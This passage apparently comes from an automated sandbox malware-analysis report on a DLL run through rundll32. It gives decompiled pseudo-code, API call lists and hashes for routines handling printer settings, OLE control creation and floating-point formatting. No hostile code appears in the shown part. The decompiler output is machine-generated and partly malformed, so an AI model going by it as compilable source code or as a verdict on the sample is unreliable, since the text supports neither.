                                                                                                            • GetSystemMetrics.USER32 ref: 10025388
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystemlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2335526769-0
                                                                                                            • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                                                            • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F60C Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001F60C(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E10029C1B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10029C1B( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                            0x1001f60f
                                                                                                            0x1001f611
                                                                                                            0x1001f613
                                                                                                            0x1001f61b
                                                                                                            0x1001f635
                                                                                                            0x1001f63d
                                                                                                            0x1001f647
                                                                                                            0x1001f64e
                                                                                                            0x1001f650
                                                                                                            0x1001f655
                                                                                                            0x1001f658
                                                                                                            0x1001f658
                                                                                                            0x1001f66f
                                                                                                            0x1001f676
                                                                                                            0x1001f68e
                                                                                                            0x1001f693
                                                                                                            0x1001f698
                                                                                                            0x1001f698
                                                                                                            0x1001f69e
                                                                                                            0x1001f69e
                                                                                                            0x1001f64e
                                                                                                            0x1001f6a3
                                                                                                            0x1001f6a7

                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F629
                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F679
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                                                              • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                                                              • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                                                              • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 168474834-0
                                                                                                            • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                                                            • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100074F2 Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E100074F2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011BF0(0x1003a548, _t239);
				_t132 =  *0x1004c470; // 0x6edecb8c
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E100243B2();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F77E(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10006AEC(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E1002EC6C(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000A762( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E1002EFD7(_t183, _t239 - 0x94, _t218);
				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}






























                                                                                                            0x100074f2
                                                                                                            0x100074f7
                                                                                                            0x10007502
                                                                                                            0x10007509
                                                                                                            0x1000750c
                                                                                                            0x1000750f
                                                                                                            0x10007514
                                                                                                            0x10007517
                                                                                                            0x1000751a
                                                                                                            0x10007522
                                                                                                            0x10007528
                                                                                                            0x1000752f
                                                                                                            0x10007539
                                                                                                            0x10007541
                                                                                                            0x10007549
                                                                                                            0x1000754c
                                                                                                            0x10007550
                                                                                                            0x10007554
                                                                                                            0x10007557
                                                                                                            0x10007557
                                                                                                            0x1000755a
                                                                                                            0x10007568
                                                                                                            0x10007569
                                                                                                            0x1000756d
                                                                                                            0x1000757c
                                                                                                            0x1000757f
                                                                                                            0x10007582
                                                                                                            0x10007585
                                                                                                            0x1000758f
                                                                                                            0x10007592
                                                                                                            0x10007595
                                                                                                            0x10007597
                                                                                                            0x10007599
                                                                                                            0x1000759d
                                                                                                            0x100075a2
                                                                                                            0x100075a6
                                                                                                            0x100075ac
                                                                                                            0x100075ae
                                                                                                            0x100075b0
                                                                                                            0x100075b3
                                                                                                            0x100075b3
                                                                                                            0x100075b6
                                                                                                            0x100075b6
                                                                                                            0x100075b8
                                                                                                            0x100075bb
                                                                                                            0x100075c0
                                                                                                            0x100075ca
                                                                                                            0x100075d3
                                                                                                            0x100075d6
                                                                                                            0x100075d9
                                                                                                            0x100075dc
                                                                                                            0x100075df
                                                                                                            0x100075ed
                                                                                                            0x100075ef
                                                                                                            0x100075ef
                                                                                                            0x100075f2
                                                                                                            0x100075f7
                                                                                                            0x100075fa
                                                                                                            0x100075fd
                                                                                                            0x10007603
                                                                                                            0x10007603
                                                                                                            0x10007605
                                                                                                            0x10007609
                                                                                                            0x10007610
                                                                                                            0x10007616
                                                                                                            0x10007619
                                                                                                            0x1000761d
                                                                                                            0x10007654
                                                                                                            0x1000765a
                                                                                                            0x1000765d
                                                                                                            0x1000765f
                                                                                                            0x10007663
                                                                                                            0x10007677
                                                                                                            0x10007677
                                                                                                            0x10007665
                                                                                                            0x10007670
                                                                                                            0x10007670
                                                                                                            0x10007679
                                                                                                            0x1000767d
                                                                                                            0x1000761f
                                                                                                            0x10007621
                                                                                                            0x10007624
                                                                                                            0x10007629
                                                                                                            0x10007630
                                                                                                            0x10007633
                                                                                                            0x1000763b
                                                                                                            0x10007640
                                                                                                            0x10007643
                                                                                                            0x10007646
                                                                                                            0x1000764d
                                                                                                            0x1000764d
                                                                                                            0x10007680
                                                                                                            0x10007689
                                                                                                            0x10007689
                                                                                                            0x1000768c
                                                                                                            0x1000768f
                                                                                                            0x1000768f
                                                                                                            0x10007696
                                                                                                            0x10007699
                                                                                                            0x100076a0
                                                                                                            0x100076a1
                                                                                                            0x100076a2
                                                                                                            0x100076ac
                                                                                                            0x100076a4
                                                                                                            0x100076a4
                                                                                                            0x100076a4
                                                                                                            0x100076b2
                                                                                                            0x100076b3
                                                                                                            0x100076bc
                                                                                                            0x100076bd
                                                                                                            0x100076c0
                                                                                                            0x100076d7
                                                                                                            0x100076db
                                                                                                            0x100076de
                                                                                                            0x100076e0
                                                                                                            0x100076e5
                                                                                                            0x10007734
                                                                                                            0x10007748
                                                                                                            0x10007754
                                                                                                            0x10007767
                                                                                                            0x10007773
                                                                                                            0x10007780
                                                                                                            0x1000778c
                                                                                                            0x1000778c
                                                                                                            0x10007796
                                                                                                            0x1000779b
                                                                                                            0x1000779b
                                                                                                            0x100077a1
                                                                                                            0x100077a6
                                                                                                            0x100077b8
                                                                                                            0x100077a8
                                                                                                            0x100077b0
                                                                                                            0x100077b2
                                                                                                            0x100077b2
                                                                                                            0x100077c0
                                                                                                            0x100077c4
                                                                                                            0x100077cf
                                                                                                            0x100077d8
                                                                                                            0x100077eb

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100074F7
                                                                                                            • MapDialogRect.USER32(?,?), ref: 10007585
                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                                                            • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                                                            • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                                                            • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 493809305-0
                                                                                                            • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                                                            • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001BC3A Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 228COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001B6CD( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001B6FB( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001B6CD( &_v20);
									E1001B6CD( &_v20);
									E1001B66F(__eflags,  &_v20,  &_v44);
									E1001B6CD( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E100117AE(_t105, _v8);
			}











































                                                                                                            0x1001bc40
                                                                                                            0x1001bc45
                                                                                                            0x1001bc48
                                                                                                            0x1001bc4c
                                                                                                            0x1001bc57
                                                                                                            0x1001bc63
                                                                                                            0x1001bc67
                                                                                                            0x1001bc6b
                                                                                                            0x1001bc6f
                                                                                                            0x1001bc73
                                                                                                            0x1001bc77
                                                                                                            0x1001bc7b
                                                                                                            0x1001bc7f
                                                                                                            0x1001bc83
                                                                                                            0x1001bc87
                                                                                                            0x1001bc8b
                                                                                                            0x1001bc8f
                                                                                                            0x1001bc93
                                                                                                            0x1001bc9a
                                                                                                            0x1001bc9c
                                                                                                            0x1001bca4
                                                                                                            0x1001bc9e
                                                                                                            0x1001bc9e
                                                                                                            0x1001bc9e
                                                                                                            0x1001bcab
                                                                                                            0x1001bcae
                                                                                                            0x1001bcc0
                                                                                                            0x1001bd3a
                                                                                                            0x1001bd45
                                                                                                            0x1001bd62
                                                                                                            0x1001bd65
                                                                                                            0x1001bd74
                                                                                                            0x1001bd78
                                                                                                            0x1001bd7b
                                                                                                            0x1001bd80
                                                                                                            0x1001bd83
                                                                                                            0x1001bd89
                                                                                                            0x1001bd93
                                                                                                            0x1001bd93
                                                                                                            0x1001bd94
                                                                                                            0x1001bd9a
                                                                                                            0x1001bd9b
                                                                                                            0x1001bd9f
                                                                                                            0x1001bda2
                                                                                                            0x1001bda5
                                                                                                            0x1001bdb9
                                                                                                            0x1001bdb9
                                                                                                            0x1001bdbc
                                                                                                            0x1001bdc0
                                                                                                            0x1001bdc0
                                                                                                            0x1001bdc5
                                                                                                            0x1001bdcb
                                                                                                            0x1001bdcb
                                                                                                            0x1001bdcb
                                                                                                            0x1001bdd0
                                                                                                            0x1001bdd7
                                                                                                            0x1001bddb
                                                                                                            0x1001bde0
                                                                                                            0x1001bde0
                                                                                                            0x1001bde0
                                                                                                            0x1001bde3
                                                                                                            0x1001bde6
                                                                                                            0x1001bde8
                                                                                                            0x1001bdec
                                                                                                            0x1001bdec
                                                                                                            0x1001bdf2
                                                                                                            0x1001bdf4
                                                                                                            0x1001bdf8
                                                                                                            0x1001bdfd
                                                                                                            0x1001bdfd
                                                                                                            0x1001bdfe
                                                                                                            0x1001bdf4
                                                                                                            0x1001bdf2
                                                                                                            0x1001be01
                                                                                                            0x1001be01
                                                                                                            0x1001be04
                                                                                                            0x1001be06
                                                                                                            0x1001be09
                                                                                                            0x1001be0c
                                                                                                            0x1001be0e
                                                                                                            0x1001be11
                                                                                                            0x1001be17
                                                                                                            0x1001be18
                                                                                                            0x1001be1d
                                                                                                            0x1001be1e
                                                                                                            0x1001be27
                                                                                                            0x1001be34
                                                                                                            0x1001be3d
                                                                                                            0x1001be4a
                                                                                                            0x1001be4d
                                                                                                            0x1001be50
                                                                                                            0x1001be50
                                                                                                            0x1001be50
                                                                                                            0x1001be53
                                                                                                            0x1001be55
                                                                                                            0x1001be55
                                                                                                            0x1001be5b
                                                                                                            0x1001be5b
                                                                                                            0x1001be5e
                                                                                                            0x1001be61
                                                                                                            0x1001be62
                                                                                                            0x1001be65
                                                                                                            0x1001be68
                                                                                                            0x1001bea8
                                                                                                            0x1001bea8
                                                                                                            0x1001beaa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001bea2
                                                                                                            0x1001bea5
                                                                                                            0x1001bea7
                                                                                                            0x1001bea7
                                                                                                            0x00000000
                                                                                                            0x1001bea7
                                                                                                            0x00000000
                                                                                                            0x1001bea5
                                                                                                            0x1001beac
                                                                                                            0x1001beae
                                                                                                            0x00000000
                                                                                                            0x1001beb0
                                                                                                            0x1001beb0
                                                                                                            0x00000000
                                                                                                            0x1001beb0
                                                                                                            0x1001be6a
                                                                                                            0x1001be75
                                                                                                            0x1001be75
                                                                                                            0x1001be77
